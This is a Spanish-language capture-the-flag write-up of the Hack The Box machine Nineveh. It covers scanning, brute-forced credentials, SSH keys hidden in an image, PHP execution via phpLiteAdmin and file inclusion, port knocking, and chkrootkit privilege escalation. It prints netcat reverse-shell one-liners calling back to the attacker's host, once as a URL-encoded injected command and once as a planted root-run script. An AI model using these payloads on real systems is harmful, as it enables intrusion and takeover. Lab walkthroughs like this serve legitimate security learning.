Como siempre empezamos con un nmap. Esta maquina fue muy interesante porque se juntaron demasiadas vulnerabilidades y configuraciones extrañas como port knocking.
root@Kali2:~/Desktop# nmap -sC -sV -O -T5 10.10.10.43 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 11:00 CET Nmap scan report for 10.10.10.43 Host is up (0.018s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_ssl-date: TLS randomness does not represent time Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%) No exact OS matches for host (test conditions non-ideal).
Con dirb e hydra descubrimos:
http://10.10.10.43/department/login.php admin:1q2w3e4r5t https://10.10.10.43/db/ password123 https://10.10.10.43/secure_notes/
Secure notes tiene una image con stenography.
root@Kali2:~/Desktop# binwalk -h Binwalk v2.1.2 Craig Heffner, ReFirmLabsUsage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ... Extraction Options: -e, --extract Automatically extract known file types -D, --dd=<type:ext:cmd> Extract <type> signatures, give the files an extension of <ext>, and execute <cmd> -M, --matryoshka Recursively scan extracted files -d, --depth=<int> Limit matryoshka recursion depth (default: 8 levels deep) -C, --directory=<str> Extract files/folders to a custom directory (default: root@Kali2:~/Desktop# binwalk -Me nineveh.png Scan Time: 2019-10-29 11:17:44 Target File: /root/Desktop/nineveh.png MD5 Checksum: 353b8f5a4578e4472c686b6e1f15c808 Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced 84 0x54 Zlib compressed data, best compression 2881744 0x2BF8D0 POSIX tar archive (GNU) Scan Time: 2019-10-29 11:17:45 Target File: /root/Desktop/_nineveh.png.extracted/54 MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- Scan Time: 2019-10-29 11:17:45 Target File: /root/Desktop/_nineveh.png.extracted/secret/nineveh.pub MD5 Checksum: 6b60618d207ad97e76664174e805cfda Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 OpenSSH RSA public key Scan Time: 2019-10-29 11:17:45 Target File: /root/Desktop/_nineveh.png.extracted/secret/nineveh.priv MD5 Checksum: f426d661f94b16292efc810ebb7ea305 Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PEM RSA private key
Adentro tiene un priv and pub key pero por el momento no sabemos donde usarla.
https://10.10.10.43/db/ esta corriendo phplite con una vulnerabilidad en la base de datos. Esta vulnerabilidad permite ejecutar php.
Y luego accediendo a
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls SQLite format 3@ -� ��S�tableaaCREATE TABLE 'a' ('css files footer.php header.php index.php login.php logout.php manage.php underconstruction.jpg underconstruction.jpg' INTEGER)Para una reverse shell
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1234+>/tmp/fYa en la machine ponemos nuestro croncheker
2019-10-29 07:38:08-- http://10.10.14.4:8000/cronchecker.sh Connecting to 10.10.14.4:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 338 [text/x-sh] Saving to: 'cronchecker.sh' cronchecker.sh 100%[===================>] 338 --.-KB/s in 0s 2019-10-29 07:38:08 (69.9 MB/s) - 'cronchecker.sh' saved [338/338] www-data@nineveh:/dev/shm$ chmod +x cronchecker.sh www-data@nineveh:/dev/shm$ bash cronchecker.sh < root 1307 1.0 0.2 8756 2228 ? Ss 07:18 0:12 /usr/sbin/knockd -d -i ens33 > root 1307 1.0 0.2 8756 2228 ? Ss 07:18 0:13 /usr/sbin/knockd -d -i ens33 < root 598 0.0 0.0 0 0 ? S 07:18 0:00 \_ [kworker/0:6] < www-data 13017 0.0 0.9 270468 9748 ? S 07:30 0:00 \_ /usr/sbin/apache2 -k start > www-data 13017 0.0 1.5 270920 15324 ? S 07:30 0:00 \_ /usr/sbin/apache2 -k start > root 21131 0.0 0.2 50224 2932 ? S 07:39 0:00 \_ /usr/sbin/CRON -f > root 21132 0.0 0.0 4512 804 ? Ss 07:39 0:00 \_ /bin/sh -c /root/vulnScan.sh > root 21134 0.0 0.2 12516 3016 ? S 07:39 0:00 \_ /bin/bash /root/vulnScan.sh > root 21136 1.0 0.2 4796 2072 ? S 07:39 0:00 \_ /bin/sh /usr/bin/chkrootkit > root 21610 0.0 0.0 4796 432 ? S 07:39 0:00 \_ /bin/sh /usr/bin/chkrootkit > root 21611 0.0 0.1 28920 1556 ? R 07:39 0:00 \_ /bin/ps ax > root 21612 0.0 0.0 14228 1016 ? S 07:39 0:00 \_ grep -E (^|[^A-Za-z0-9_])sshd([^A-Za-z0-9_]|$) > root 21613 0.0 0.1 14228 1020 ? S 07:39 0:00 \_ grep -E -v grep > root 21614 0.0 0.0 14228 936 ? S 07:39 0:00 \_ grep -E -v chkrootkit > root 21615 0.0 0.0 4796 436 ? S 07:39 0:00 \_ /bin/sh /usr/bin/chkrootkit > root 21616 0.0 0.1 24760 1420 ? S 07:39 0:00 \_ /usr/bin/awk { print $5 }Descubrimos dos cosas interesantes.
- chkrootkit (vulnerable)
- knockd (port knocking)
LinEnum nos muestra que estamos escuchando en SSH en localhost wtf y knockd otra vez:
[-] Process binaries and associated permissions (from above list): -rwxr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash lrwxrwxrwx 1 root root 4 Jul 2 2017 /bin/sh -> dash ... -rwxr-xr-x 1 root root 48080 Mar 25 2009 /usr/sbin/knockd … [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTENPara checkar knockd podemor ir al config file
www-data@nineveh:/dev/shm$ cat /etc/knockd.conf [options] logfile = /var/log/knockd.log interface = ens33 [openSSH] sequence = 571, 290, 911 seq_timeout = 5 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 911,290,571 seq_timeout = 5 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = synPara abrir un puerto necesitamos “tocar” el 571, 290 y 911
root@Kali2:~/Desktop# for x in 571 290 911; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.43; done Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.43 Host is up. PORT STATE SERVICE 571/tcp filtered umeter Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.43 Host is up. PORT STATE SERVICE 290/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.43 Host is up. PORT STATE SERVICE 911/tcp filtered xact-backup Nmap done: 1 IP address (1 host up) scanned in 1.15 seconds root@Kali2:~/Desktop# nmap -p 22 10.10.10.43 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET Nmap scan report for 10.10.10.43 Host is up (0.020s latency). PORT STATE SERVICE 22/tcp open ssh Nmap done: 1 IP address (1 host up) scanned in 0.24 secondsUna vez abierto podemos usar entrar via SSH con la información extraida de la imagen.
Ahora vimos chrookit.
root@Kali2:~/Desktop# searchsploit chkrootkit -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Chkrootkit - Local Privilege Escalation (Metasploit) | exploits/linux/local/38775.rb Chkrootkit 0.49 - Local Privilege Escalation | exploits/linux/local/33899.txt -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result root@Kali2:~/Desktop# searchsploit -x 33899 - Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously) - Run chkrootkit (as uid 0) Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.En searchsploit nos dice que poniendo un archivo en /tmp/update se ejecutara como root. Asi que creamos un archivo “update”
#!/bin/sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/fY llama a casa 🙂
root@Kali2:~/Desktop# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.10.43] 39640 /bin/sh: 0: can't access tty; job control turned off # whoami root # python3 -c 'import pty;pty.spawn("/bin/bash");' root@nineveh:~# ^Z [1]+ Stopped nc -nlvp 1234 root@Kali2:~/Desktop# stty raw -echo root@Kali2:~/Desktop# nc -nlvp 1234 root@nineveh:~# cd / root@nineveh:/# cd root/ root@nineveh:~# cat root.txt 8a2b49...